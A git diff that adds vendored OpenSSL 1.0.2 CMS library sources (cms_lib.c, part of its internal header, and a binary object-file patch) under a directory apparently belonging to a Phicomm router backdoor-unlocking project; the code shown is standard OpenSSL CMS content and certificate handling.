+int cms_set1_SignerIdentifier(CMS_SignerIdentifier *sid, X509 *cert,
+                              int type);
+int cms_SignerIdentifier_get0_signer_id(CMS_SignerIdentifier *sid,
+                                        ASN1_OCTET_STRING **keyid,
+                                        X509_NAME **issuer,
+                                        ASN1_INTEGER **sno);
+int cms_SignerIdentifier_cert_cmp(CMS_SignerIdentifier *sid, X509 *cert);
+
+CMS_ContentInfo *cms_CompressedData_create(int comp_nid);
+BIO *cms_CompressedData_init_bio(CMS_ContentInfo *cms);
+
+void cms_DigestAlgorithm_set(X509_ALGOR *alg, const EVP_MD *md);
+BIO *cms_DigestAlgorithm_init_bio(X509_ALGOR *digestAlgorithm);
+int cms_DigestAlgorithm_find_ctx(EVP_MD_CTX *mctx, BIO *chain,
+                                 X509_ALGOR *mdalg);
+
+int cms_ias_cert_cmp(CMS_IssuerAndSerialNumber *ias, X509 *cert);
+int cms_keyid_cert_cmp(ASN1_OCTET_STRING *keyid, X509 *cert);
+int cms_set1_ias(CMS_IssuerAndSerialNumber **pias, X509 *cert);
+int cms_set1_keyid(ASN1_OCTET_STRING **pkeyid, X509 *cert);
+
+BIO *cms_EncryptedContent_init_bio(CMS_EncryptedContentInfo *ec);
+BIO *cms_EncryptedData_init_bio(CMS_ContentInfo *cms);
+int cms_EncryptedContent_init(CMS_EncryptedContentInfo *ec,
+                              const EVP_CIPHER *cipher,
+                              const unsigned char *key, size_t keylen);
+
+int cms_Receipt_verify(CMS_ContentInfo *cms, CMS_ContentInfo *req_cms);
+int cms_msgSigDigest_add1(CMS_SignerInfo *dest, CMS_SignerInfo *src);
+ASN1_OCTET_STRING *cms_encode_Receipt(CMS_SignerInfo *si);
+
+BIO *cms_EnvelopedData_init_bio(CMS_ContentInfo *cms);
+CMS_EnvelopedData *cms_get0_enveloped(CMS_ContentInfo *cms);
+int cms_env_asn1_ctrl(CMS_RecipientInfo *ri, int cmd);
+int cms_pkey_get_ri_type(EVP_PKEY *pk);
+/* KARI routines */
+int cms_RecipientInfo_kari_init(CMS_RecipientInfo *ri, X509 *recip,
+                                EVP_PKEY *pk, unsigned int flags);
+int cms_RecipientInfo_kari_encrypt(CMS_ContentInfo *cms,
+                                   CMS_RecipientInfo *ri);
+
+/* PWRI routines */
+int cms_RecipientInfo_pwri_crypt(CMS_ContentInfo *cms, CMS_RecipientInfo *ri,
+                                 int en_de);
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_lib.c
new file mode 100644
index 0000000..d6cb60d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_lib.c
@@ -0,0 +1,652 @@
+/* crypto/cms/cms_lib.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include <openssl/asn1t.h>
+#include <openssl/x509v3.h>
+#include <openssl/err.h>
+#include <openssl/pem.h>
+#include <openssl/bio.h>
+#include <openssl/asn1.h>
+#include "cms.h"
+#include "cms_lcl.h"
+
+IMPLEMENT_ASN1_FUNCTIONS(CMS_ContentInfo)
+IMPLEMENT_ASN1_PRINT_FUNCTION(CMS_ContentInfo)
+
+DECLARE_ASN1_ITEM(CMS_CertificateChoices)
+DECLARE_ASN1_ITEM(CMS_RevocationInfoChoice)
+DECLARE_STACK_OF(CMS_CertificateChoices)
+DECLARE_STACK_OF(CMS_RevocationInfoChoice)
+
+const ASN1_OBJECT *CMS_get0_type(CMS_ContentInfo *cms)
+{
+    return cms->contentType;
+}
+
+CMS_ContentInfo *cms_Data_create(void)
+{
+    CMS_ContentInfo *cms;
+    cms = CMS_ContentInfo_new();
+    if (cms) {
+        cms->contentType = OBJ_nid2obj(NID_pkcs7_data);
+        /* Never detached */
+        CMS_set_detached(cms, 0);
+    }
+    return cms;
+}
+
+BIO *cms_content_bio(CMS_ContentInfo *cms)
+{
+    ASN1_OCTET_STRING **pos = CMS_get0_content(cms);
+    if (!pos)
+        return NULL;
+    /* If content detached data goes nowhere: create NULL BIO */
+    if (!*pos)
+        return BIO_new(BIO_s_null());
+    /*
+     * If content not detached and created return memory BIO
+     */
+    if (!*pos || ((*pos)->flags == ASN1_STRING_FLAG_CONT))
+        return BIO_new(BIO_s_mem());
+    /* Else content was read in: return read only BIO for it */
+    return BIO_new_mem_buf((*pos)->data, (*pos)->length);
+}
+
+BIO *CMS_dataInit(CMS_ContentInfo *cms, BIO *icont)
+{
+    BIO *cmsbio, *cont;
+    if (icont)
+        cont = icont;
+    else
+        cont = cms_content_bio(cms);
+    if (!cont) {
+        CMSerr(CMS_F_CMS_DATAINIT, CMS_R_NO_CONTENT);
+        return NULL;
+    }
+    switch (OBJ_obj2nid(cms->contentType)) {
+
+    case NID_pkcs7_data:
+        return cont;
+
+    case NID_pkcs7_signed:
+        cmsbio = cms_SignedData_init_bio(cms);
+        break;
+
+    case NID_pkcs7_digest:
+        cmsbio = cms_DigestedData_init_bio(cms);
+        break;
+#ifdef ZLIB
+    case NID_id_smime_ct_compressedData:
+        cmsbio = cms_CompressedData_init_bio(cms);
+        break;
+#endif
+
+    case NID_pkcs7_encrypted:
+        cmsbio = cms_EncryptedData_init_bio(cms);
+        break;
+
+    case NID_pkcs7_enveloped:
+        cmsbio = cms_EnvelopedData_init_bio(cms);
+        break;
+
+    default:
+        CMSerr(CMS_F_CMS_DATAINIT, CMS_R_UNSUPPORTED_TYPE);
+        return NULL;
+    }
+
+    if (cmsbio)
+        return BIO_push(cmsbio, cont);
+
+    if (!icont)
+        BIO_free(cont);
+    return NULL;
+
+}
+
+int CMS_dataFinal(CMS_ContentInfo *cms, BIO *cmsbio)
+{
+    ASN1_OCTET_STRING **pos = CMS_get0_content(cms);
+    if (!pos)
+        return 0;
+    /* If ebmedded content find memory BIO and set content */
+    if (*pos && ((*pos)->flags & ASN1_STRING_FLAG_CONT)) {
+        BIO *mbio;
+        unsigned char *cont;
+        long contlen;
+        mbio = BIO_find_type(cmsbio, BIO_TYPE_MEM);
+        if (!mbio) {
+            CMSerr(CMS_F_CMS_DATAFINAL, CMS_R_CONTENT_NOT_FOUND);
+            return 0;
+        }
+        contlen = BIO_get_mem_data(mbio, &cont);
+        /* Set bio as read only so its content can't be clobbered */
+        BIO_set_flags(mbio, BIO_FLAGS_MEM_RDONLY);
+        BIO_set_mem_eof_return(mbio, 0);
+        ASN1_STRING_set0(*pos, cont, contlen);
+        (*pos)->flags &= ~ASN1_STRING_FLAG_CONT;
+    }
+
+    switch (OBJ_obj2nid(cms->contentType)) {
+
+    case NID_pkcs7_data:
+    case NID_pkcs7_enveloped:
+    case NID_pkcs7_encrypted:
+    case NID_id_smime_ct_compressedData:
+        /* Nothing to do */
+        return 1;
+
+    case NID_pkcs7_signed:
+        return cms_SignedData_final(cms, cmsbio);
+
+    case NID_pkcs7_digest:
+        return cms_DigestedData_do_final(cms, cmsbio, 0);
+
+    default:
+        CMSerr(CMS_F_CMS_DATAFINAL, CMS_R_UNSUPPORTED_TYPE);
+        return 0;
+    }
+}
+
+/*
+ * Return an OCTET STRING pointer to content. This allows it to be accessed
+ * or set later.
+ */
+
+ASN1_OCTET_STRING **CMS_get0_content(CMS_ContentInfo *cms)
+{
+    switch (OBJ_obj2nid(cms->contentType)) {
+
+    case NID_pkcs7_data:
+        return &cms->d.data;
+
+    case NID_pkcs7_signed:
+        return &cms->d.signedData->encapContentInfo->eContent;
+
+    case NID_pkcs7_enveloped:
+        return &cms->d.envelopedData->encryptedContentInfo->encryptedContent;
+
+    case NID_pkcs7_digest:
+        return &cms->d.digestedData->encapContentInfo->eContent;
+
+    case NID_pkcs7_encrypted:
+        return &cms->d.encryptedData->encryptedContentInfo->encryptedContent;
+
+    case NID_id_smime_ct_authData:
+        return &cms->d.authenticatedData->encapContentInfo->eContent;
+
+    case NID_id_smime_ct_compressedData:
+        return &cms->d.compressedData->encapContentInfo->eContent;
+
+    default:
+        if (cms->d.other->type == V_ASN1_OCTET_STRING)
+            return &cms->d.other->value.octet_string;
+        CMSerr(CMS_F_CMS_GET0_CONTENT, CMS_R_UNSUPPORTED_CONTENT_TYPE);
+        return NULL;
+
+    }
+}
+
+/*
+ * Return an ASN1_OBJECT pointer to content type. This allows it to be
+ * accessed or set later.
+ */
+
+static ASN1_OBJECT **cms_get0_econtent_type(CMS_ContentInfo *cms)
+{
+    switch (OBJ_obj2nid(cms->contentType)) {
+
+    case NID_pkcs7_signed:
+        return &cms->d.signedData->encapContentInfo->eContentType;
+
+    case NID_pkcs7_enveloped:
+        return &cms->d.envelopedData->encryptedContentInfo->contentType;
+
+    case NID_pkcs7_digest:
+        return &cms->d.digestedData->encapContentInfo->eContentType;
+
+    case NID_pkcs7_encrypted:
+        return &cms->d.encryptedData->encryptedContentInfo->contentType;
+
+    case NID_id_smime_ct_authData:
+        return &cms->d.authenticatedData->encapContentInfo->eContentType;
+
+    case NID_id_smime_ct_compressedData:
+        return &cms->d.compressedData->encapContentInfo->eContentType;
+
+    default:
+        CMSerr(CMS_F_CMS_GET0_ECONTENT_TYPE, CMS_R_UNSUPPORTED_CONTENT_TYPE);
+        return NULL;
+
+    }
+}
+
+const ASN1_OBJECT *CMS_get0_eContentType(CMS_ContentInfo *cms)
+{
+    ASN1_OBJECT **petype;
+    petype = cms_get0_econtent_type(cms);
+    if (petype)
+        return *petype;
+    return NULL;
+}
+
+int CMS_set1_eContentType(CMS_ContentInfo *cms, const ASN1_OBJECT *oid)
+{
+    ASN1_OBJECT **petype, *etype;
+    petype = cms_get0_econtent_type(cms);
+    if (!petype)
+        return 0;
+    if (!oid)
+        return 1;
+    etype = OBJ_dup(oid);
+    if (!etype)
+        return 0;
+    ASN1_OBJECT_free(*petype);
+    *petype = etype;
+    return 1;
+}
+
+int CMS_is_detached(CMS_ContentInfo *cms)
+{
+    ASN1_OCTET_STRING **pos;
+    pos = CMS_get0_content(cms);
+    if (!pos)
+        return -1;
+    if (*pos)
+        return 0;
+    return 1;
+}
+
+int CMS_set_detached(CMS_ContentInfo *cms, int detached)
+{
+    ASN1_OCTET_STRING **pos;
+    pos = CMS_get0_content(cms);
+    if (!pos)
+        return 0;
+    if (detached) {
+        if (*pos) {
+            ASN1_OCTET_STRING_free(*pos);
+            *pos = NULL;
+        }
+        return 1;
+    }
+    if (!*pos)
+        *pos = ASN1_OCTET_STRING_new();
+    if (*pos) {
+        /*
+         * NB: special flag to show content is created and not read in.
+         */
+        (*pos)->flags |= ASN1_STRING_FLAG_CONT;
+        return 1;
+    }
+    CMSerr(CMS_F_CMS_SET_DETACHED, ERR_R_MALLOC_FAILURE);
+    return 0;
+}
+
+/* Set up an X509_ALGOR DigestAlgorithmIdentifier from an EVP_MD */
+
+void cms_DigestAlgorithm_set(X509_ALGOR *alg, const EVP_MD *md)
+{
+    int param_type;
+
+    if (md->flags & EVP_MD_FLAG_DIGALGID_ABSENT)
+        param_type = V_ASN1_UNDEF;
+    else
+        param_type = V_ASN1_NULL;
+
+    X509_ALGOR_set0(alg, OBJ_nid2obj(EVP_MD_type(md)), param_type, NULL);
+
+}
+
+/* Create a digest BIO from an X509_ALGOR structure */
+
+BIO *cms_DigestAlgorithm_init_bio(X509_ALGOR *digestAlgorithm)
+{
+    BIO *mdbio = NULL;
+    ASN1_OBJECT *digestoid;
+    const EVP_MD *digest;
+    X509_ALGOR_get0(&digestoid, NULL, NULL, digestAlgorithm);
+    digest = EVP_get_digestbyobj(digestoid);
+    if (!digest) {
+        CMSerr(CMS_F_CMS_DIGESTALGORITHM_INIT_BIO,
+               CMS_R_UNKNOWN_DIGEST_ALGORIHM);
+        goto err;
+    }
+    mdbio = BIO_new(BIO_f_md());
+    if (!mdbio || !BIO_set_md(mdbio, digest)) {
+        CMSerr(CMS_F_CMS_DIGESTALGORITHM_INIT_BIO, CMS_R_MD_BIO_INIT_ERROR);
+        goto err;
+    }
+    return mdbio;
+ err:
+    if (mdbio)
+        BIO_free(mdbio);
+    return NULL;
+}
+
+/* Locate a message digest content from a BIO chain based on SignerInfo */
+
+int cms_DigestAlgorithm_find_ctx(EVP_MD_CTX *mctx, BIO *chain,
+                                 X509_ALGOR *mdalg)
+{
+    int nid;
+    ASN1_OBJECT *mdoid;
+    X509_ALGOR_get0(&mdoid, NULL, NULL, mdalg);
+    nid = OBJ_obj2nid(mdoid);
+    /* Look for digest type to match signature */
+    for (;;) {
+        EVP_MD_CTX *mtmp;
+        chain = BIO_find_type(chain, BIO_TYPE_MD);
+        if (chain == NULL) {
+            CMSerr(CMS_F_CMS_DIGESTALGORITHM_FIND_CTX,
+                   CMS_R_NO_MATCHING_DIGEST);
+            return 0;
+        }
+        BIO_get_md_ctx(chain, &mtmp);
+        if (EVP_MD_CTX_type(mtmp) == nid
+            /*
+             * Workaround for broken implementations that use signature
+             * algorithm OID instead of digest.
+             */
+            || EVP_MD_pkey_type(EVP_MD_CTX_md(mtmp)) == nid)
+            return EVP_MD_CTX_copy_ex(mctx, mtmp);
+        chain = BIO_next(chain);
+    }
+}
+
+static STACK_OF(CMS_CertificateChoices)
+**cms_get0_certificate_choices(CMS_ContentInfo *cms)
+{
+    switch (OBJ_obj2nid(cms->contentType)) {
+
+    case NID_pkcs7_signed:
+        return &cms->d.signedData->certificates;
+
+    case NID_pkcs7_enveloped:
+        return &cms->d.envelopedData->originatorInfo->certificates;
+
+    default:
+        CMSerr(CMS_F_CMS_GET0_CERTIFICATE_CHOICES,
+               CMS_R_UNSUPPORTED_CONTENT_TYPE);
+        return NULL;
+
+    }
+}
+
+CMS_CertificateChoices *CMS_add0_CertificateChoices(CMS_ContentInfo *cms)
+{
+    STACK_OF(CMS_CertificateChoices) **pcerts;
+    CMS_CertificateChoices *cch;
+    pcerts = cms_get0_certificate_choices(cms);
+    if (!pcerts)
+        return NULL;
+    if (!*pcerts)
+        *pcerts = sk_CMS_CertificateChoices_new_null();
+    if (!*pcerts)
+        return NULL;
+    cch = M_ASN1_new_of(CMS_CertificateChoices);
+    if (!cch)
+        return NULL;
+    if (!sk_CMS_CertificateChoices_push(*pcerts, cch)) {
+        M_ASN1_free_of(cch, CMS_CertificateChoices);
+        return NULL;
+    }
+    return cch;
+}
+
+int CMS_add0_cert(CMS_ContentInfo *cms, X509 *cert)
+{
+    CMS_CertificateChoices *cch;
+    STACK_OF(CMS_CertificateChoices) **pcerts;
+    int i;
+    pcerts = cms_get0_certificate_choices(cms);
+    if (!pcerts)
+        return 0;
+    for (i = 0; i < sk_CMS_CertificateChoices_num(*pcerts); i++) {
+        cch = sk_CMS_CertificateChoices_value(*pcerts, i);
+        if (cch->type == CMS_CERTCHOICE_CERT) {
+            if (!X509_cmp(cch->d.certificate, cert)) {
+                CMSerr(CMS_F_CMS_ADD0_CERT,
+                       CMS_R_CERTIFICATE_ALREADY_PRESENT);
+                return 0;
+            }
+        }
+    }
+    cch = CMS_add0_CertificateChoices(cms);
+    if (!cch)
+        return 0;
+    cch->type = CMS_CERTCHOICE_CERT;
+    cch->d.certificate = cert;
+    return 1;
+}
+
+int CMS_add1_cert(CMS_ContentInfo *cms, X509 *cert)
+{
+    int r;
+    r = CMS_add0_cert(cms, cert);
+    if (r > 0)
+        CRYPTO_add(&cert->references, 1, CRYPTO_LOCK_X509);
+    return r;
+}
+
+static STACK_OF(CMS_RevocationInfoChoice)
+**cms_get0_revocation_choices(CMS_ContentInfo *cms)
+{
+    switch (OBJ_obj2nid(cms->contentType)) {
+
+    case NID_pkcs7_signed:
+        return &cms->d.signedData->crls;
+
+    case NID_pkcs7_enveloped:
+        return &cms->d.envelopedData->originatorInfo->crls;
+
+    default:
+        CMSerr(CMS_F_CMS_GET0_REVOCATION_CHOICES,
+               CMS_R_UNSUPPORTED_CONTENT_TYPE);
+        return NULL;
+
+    }
+}
+
+CMS_RevocationInfoChoice *CMS_add0_RevocationInfoChoice(CMS_ContentInfo *cms)
+{
+    STACK_OF(CMS_RevocationInfoChoice) **pcrls;
+    CMS_RevocationInfoChoice *rch;
+    pcrls = cms_get0_revocation_choices(cms);
+    if (!pcrls)
+        return NULL;
+    if (!*pcrls)
+        *pcrls = sk_CMS_RevocationInfoChoice_new_null();
+    if (!*pcrls)
+        return NULL;
+    rch = M_ASN1_new_of(CMS_RevocationInfoChoice);
+    if (!rch)
+        return NULL;
+    if (!sk_CMS_RevocationInfoChoice_push(*pcrls, rch)) {
+        M_ASN1_free_of(rch, CMS_RevocationInfoChoice);
+        return NULL;
+    }
+    return rch;
+}
+
+int CMS_add0_crl(CMS_ContentInfo *cms, X509_CRL *crl)
+{
+    CMS_RevocationInfoChoice *rch;
+    rch = CMS_add0_RevocationInfoChoice(cms);
+    if (!rch)
+        return 0;
+    rch->type = CMS_REVCHOICE_CRL;
+    rch->d.crl = crl;
+    return 1;
+}
+
+int CMS_add1_crl(CMS_ContentInfo *cms, X509_CRL *crl)
+{
+    int r;
+    r = CMS_add0_crl(cms, crl);
+    if (r > 0)
+        CRYPTO_add(&crl->references, 1, CRYPTO_LOCK_X509_CRL);
+    return r;
+}
+
+STACK_OF(X509) *CMS_get1_certs(CMS_ContentInfo *cms)
+{
+    STACK_OF(X509) *certs = NULL;
+    CMS_CertificateChoices *cch;
+    STACK_OF(CMS_CertificateChoices) **pcerts;
+    int i;
+    pcerts = cms_get0_certificate_choices(cms);
+    if (!pcerts)
+        return NULL;
+    for (i = 0; i < sk_CMS_CertificateChoices_num(*pcerts); i++) {
+        cch = sk_CMS_CertificateChoices_value(*pcerts, i);
+        if (cch->type == 0) {
+            if (!certs) {
+                certs = sk_X509_new_null();
+                if (!certs)
+                    return NULL;
+            }
+            if (!sk_X509_push(certs, cch->d.certificate)) {
+                sk_X509_pop_free(certs, X509_free);
+                return NULL;
+            }
+            CRYPTO_add(&cch->d.certificate->references, 1, CRYPTO_LOCK_X509);
+        }
+    }
+    return certs;
+
+}
+
+STACK_OF(X509_CRL) *CMS_get1_crls(CMS_ContentInfo *cms)
+{
+    STACK_OF(X509_CRL) *crls = NULL;
+    STACK_OF(CMS_RevocationInfoChoice) **pcrls;
+    CMS_RevocationInfoChoice *rch;
+    int i;
+    pcrls = cms_get0_revocation_choices(cms);
+    if (!pcrls)
+        return NULL;
+    for (i = 0; i < sk_CMS_RevocationInfoChoice_num(*pcrls); i++) {
+        rch = sk_CMS_RevocationInfoChoice_value(*pcrls, i);
+        if (rch->type == 0) {
+            if (!crls) {
+                crls = sk_X509_CRL_new_null();
+                if (!crls)
+                    return NULL;
+            }
+            if (!sk_X509_CRL_push(crls, rch->d.crl)) {
+                sk_X509_CRL_pop_free(crls, X509_CRL_free);
+                return NULL;
+            }
+            CRYPTO_add(&rch->d.crl->references, 1, CRYPTO_LOCK_X509_CRL);
+        }
+    }
+    return crls;
+}
+
+int cms_ias_cert_cmp(CMS_IssuerAndSerialNumber *ias, X509 *cert)
+{
+    int ret;
+    ret = X509_NAME_cmp(ias->issuer, X509_get_issuer_name(cert));
+    if (ret)
+        return ret;
+    return ASN1_INTEGER_cmp(ias->serialNumber, X509_get_serialNumber(cert));
+}
+
+int cms_keyid_cert_cmp(ASN1_OCTET_STRING *keyid, X509 *cert)
+{
+    X509_check_purpose(cert, -1, -1);
+    if (!cert->skid)
+        return -1;
+    return ASN1_OCTET_STRING_cmp(keyid, cert->skid);
+}
+
+int cms_set1_ias(CMS_IssuerAndSerialNumber **pias, X509 *cert)
+{
+    CMS_IssuerAndSerialNumber *ias;
+    ias = M_ASN1_new_of(CMS_IssuerAndSerialNumber);
+    if (!ias)
+        goto err;
+    if (!X509_NAME_set(&ias->issuer, X509_get_issuer_name(cert)))
+        goto err;
+    if (!ASN1_STRING_copy(ias->serialNumber, X509_get_serialNumber(cert)))
+        goto err;
+    if (*pias)
+        M_ASN1_free_of(*pias, CMS_IssuerAndSerialNumber);
+    *pias = ias;
+    return 1;
+ err:
+    if (ias)
+        M_ASN1_free_of(ias, CMS_IssuerAndSerialNumber);
+    CMSerr(CMS_F_CMS_SET1_IAS, ERR_R_MALLOC_FAILURE);
+    return 0;
+}
+
+int cms_set1_keyid(ASN1_OCTET_STRING **pkeyid, X509 *cert)
+{
+    ASN1_OCTET_STRING *keyid = NULL;
+    X509_check_purpose(cert, -1, -1);
+    if (!cert->skid) {
+        CMSerr(CMS_F_CMS_SET1_KEYID, CMS_R_CERTIFICATE_HAS_NO_KEYID);
+        return 0;
+    }
+    keyid = ASN1_STRING_dup(cert->skid);
+    if (!keyid) {
+        CMSerr(CMS_F_CMS_SET1_KEYID, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    if (*pkeyid)
+        ASN1_OCTET_STRING_free(*pkeyid);
+    *pkeyid = keyid;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..a05a0cde7516be73f369cbc8515e3da638151c30
GIT binary patch
literal 14792
zcmc(leQ+GbmB2?I#tXJrYXSBe9JAOmYz$VkwgDR(qmfqDES4o(k{#Q!8B4osYi(&I
zc4z%@0XwjkFMEq}5S%M=N3KZXDoEXtgG*KLQJm1lUn0eE7w{iYRKU5S62n3agvbt<
z)4kXIdiU*UC%MYq)pgZsdVc--_3PKKdwQmIsHtU5d0CmJQkk||E8HonX=Aq)^7SHH
zuX(g8t;5KCZe;I1k0^cVI&1NvndwWjtvl0~=2)}Smu6Yjx#f5LD->E^x~sYZF20=K
z$Tqr+Y`rJ9f^x3hS19MtEu@?`cYRY}H1P5Zk3;2=hv3gkweUwY6d3I~QQYt>s|uP;
zU6WTR)ucy@)qMSrs<|4~c$FF>J?bKh(xbj2iw;jx_1mg>pBck5fNSsJA9;VR?fx#?
zz3^*ZK9m`oq#`@@1ga|T@O6jgr7vA`Fq}SrZTixbeO<<|XvhdxK4g^r`|62v(&;ON
z(^ISRPF-mXH@b40^7qx0^W<)1o%ZCG(VahcCFau0D^phpZ}3rh5c*O)Drl&_UJQ~k
zG-}luSq-kKse<ID8|nQXU&<}ZGiUA<{Wh}uUD>)VA|DvtDmtrohBB8o8kyfguYYR{
zji=^Nol~f8x{QoN(0ncy%C4#rh2)CXNv>$g{93j@H=nD{=Ugfm%A7=#7k3$%-x!%Q
z+x2b2BH7dv(A3C)>TXluU8%6z7<wx;!^m8aw-uqx2Q8U%T~Jr{Vw1iRd-5st<ckg?
z{edT9WGff?L64CM*0=(rqMngC5f}wcRfjKPNwxy*u*T~>J}W*_R;g(P6Giu{q)jmp
ze(xEf>z9GoMqqM*)-yumh*plZE`&0t#eLvq5WqPEOg5QaR%2vW1~Z?~ZH1BE;d#f%
zJ|JgU=BF^3WrzjS?_Zn#Y|6e>6qpcVj~ZoT5Msx1p?L5!oYtv%xz#P1U*$a!2)xE`
z=QA(Hp%M?8+!Ue5$Zo4~MU16$g?p?i(ysJL4|-GIuHP#>y5W5G^N9)cPX&aQj1>_k
z8_p+WL8>w^np+Gmm0E{Bw0z1cBZKa<pqDG9_RK9pXlvJYQVynRdU{MWFb!-r(#tiy
z>gZ@NlaEV1^J&KhSsiqB8`<U1R@2bC)*Sss^oKDtVYSNgGdLt#t{zazMJ<BaVt8j5
zX~W}_RdVyBdvuT<c?|v(+>@(-SPN#(ZS7Ja)hQHFuzFv@SuaRn9HJzYsg!d8qA*_p
zgU`rZTyJF8c+%%wM*31&(;OMVdivcfGH3LOSA+_Eb1?HC;4C9^dVAnyihnVqLB;O_
zuLZ{SP6%SJJ%|mOUxu2A6oo1p!RaYlHolErw2Hg9C6qZu-jUHOJD2iHuk4##WgWQt
zCN(K?b1>H46SI@II3@QI_|C|}JcF>3v#t<UUg05K4!jQi`+4BC{Gt;W$I0q1>Zcc?
zVfg+USIcl;jYpcBg<Fx!oB*$lxM0pvKg2ZslC(dK_9u(F3=z6r8oeKQ-e}NAn#qAH
z-bhs$S*ymA@9RxQ2_fq(7UA#RHvtm_CKC+Pq{-x$lZlpCh~uAJlC!A=BOL<Snq>@&
zCzR+24aCgcV(OO&U0?1km_ZOE0>ao<8^hu$rmO_FgLexd3#(u#^M#nE7(VB9*{GPQ
z`*8LI#?_PzuK4JnAr_`_p&hJBEyV`}EXu061=6qofPOuu{0htIbRhuaJw11$K5;tt
zclpH*ChE~MAc?;2b;*SxebNigQ0t1`i4Ph%ul3Byq0xgrWB6-x_2X~DoPGi4@ran*
z^6@SjDxQ_#%jYis-}@4+6s>~~a4qx5Zt1d5nawU(sk+qgmgtdJKYksA=?ho<(H@CM
z*T#<XN5@64QrmJH;pyPgk1rLEmXDcJ(r4xhoAilOg>gK8aJv{sIcy@jPNjYUGdCqy
zD2lDw5G=W+A_zWgkzs`7c_W+3KbaxK4jb8`5X+5qL5T4ugRTr-WH-2t3@-FJea8F$
zZ?K#XuzSv2R6C}kSv5O9sk2{mZGq|5wOwpT)YA&;f06##1V%*q)d_vQk$FdS%E%^r
zVaH@mgE|*f9eAeELr(5Tpw{PnreiFbFn{3@DV2z)fXG70?P_LY1QaH|H4jD@pLf$~
z0ide#shV3vRP{qnTk(*47Q(Oakb~{K+A*P1pi|HxVPWP1J!-QLK%XYm#_vg}o|{dr
z@wHYcf6k^ncP*JodkXf{2g(1X6z)%&eX*X}u%<OPHs0y;Z|q6Mt(0#??b6!1#eq9g
z;x=$_NnLH-vM)=FO~dXE-lH^a3jCT|H{!l+6q(pM!1WsVVJiExcCBo`r|kOaQ(ce1
zQsf0TSCnYl0leyNPrAH(pW7wNmQz`Cp{z-jbyC^dLRkpQ(2hYW!#pOu9u_&7R}A0E
zR9;>GULsLPu~A}Iv$C_4hbBeBzKFqu>kpAMiN5>*ZSuiwCG;0l5dW-kdtz6)T}{)P
z#otB{S_arpGN(!A;qsu{d!!=h_N6P!6IZ#t&2CQvR<qn*a1~@VtsZ1|P`!4%g6?mY
zH@LmS6%B6R!<9j||Hzb}yDoi2&|P1#w9H+nyZyS`2NDgWLX6Kb(jmqQY;OhSHK0!H
z2jLomANJ`8+LW#U4fhKpbdbY3?^68*B)6UFUnc$_a<EPGNz^Y-s9vD&Y9MGZ1@MoM
z+l}25Hq=v@^4-JbI{KyA?F+lT_qaVlYO9yz&XJDc@{rs6F!-;o{FK`Z#)HSu&ySGY
z@A7iZQqFgza*f-c27j$De_gl<8j@~8UyM;bd})z3Lb2@2cGVZu{}IU@BRLum7{?<x
z9;m;*JTqCppC-)R#rmP%pi(dVv7Y4qkR9mL{Uo;t^@(_l<b8VdztPrmsP-bs;euq3
zEr_HeQ*?~2^1pWb!AurZSohMOSho)9E~~@_Wqh-^Gu*yzm<U0)2Li8Y8u%Y30>&WL
z>7_b%U_}wDFs|tesMB6tM^@MTAoc{+`CF``;`0c`H_W-e%)4F4j*%>Ggr)v_P(Q?B
z`PRH4Smuy$DpYD8Pn0UIDEY+-*HChztx|<pb&KINxGiUT#F`3hK5=y~)>B{@XDB}k
zS4?6pm04&NSM$lKLYq1n0;$lhbl_JxaJ05Kb%|Ri{kR$wryX#s)_7jB*MUFez#jo#
z4StwLYn9S@%t8Kn2Y!n5TyN9!ri1*iN&Xg_{O1nxSArbcxzZ*-5AK!CP&J<xll)qe
